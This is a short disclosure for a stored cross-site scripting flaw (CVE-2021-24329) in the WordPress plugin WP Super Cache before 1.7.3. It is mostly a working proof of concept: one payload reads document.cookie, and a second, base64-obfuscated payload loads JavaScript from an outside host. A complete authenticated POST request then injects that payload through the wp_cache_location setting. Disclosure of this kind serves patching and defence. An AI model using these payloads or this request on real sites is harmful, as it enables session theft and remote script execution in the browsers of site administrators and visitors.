WP Super Cache < 1.7.3 – Authenticated Stored Cross-Site Scripting (XSS) | CVE 2021-24329

Description

The plugin did not properly sanitise its wp_cache_location parameter in its settings, which could lead to a Stored Cross-Site Scripting issue.

Proof of Concept

### -- [ Payloads: ]

[$] ";' onmouseover=alert(document.cookie); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; 

[$] ";' onmouseover=eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp`)); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; 



### -- [ PoC | Authenticated Persistent XSS | Cache Location: ]

[!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 773
Cookie: [admin cookies]

_wpnonce=c6b9540023&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fexample.com%2Fwp-content%2Fcache%2F%22%3B%27+onmouseover%3Deval%28atob%28%60eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp%60%29%29%3B+style%3Dposition%3Afixed%3Bwidth%3A100%25%3Bheight%3A100%25%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3B+&_wpnonce=c6b9540023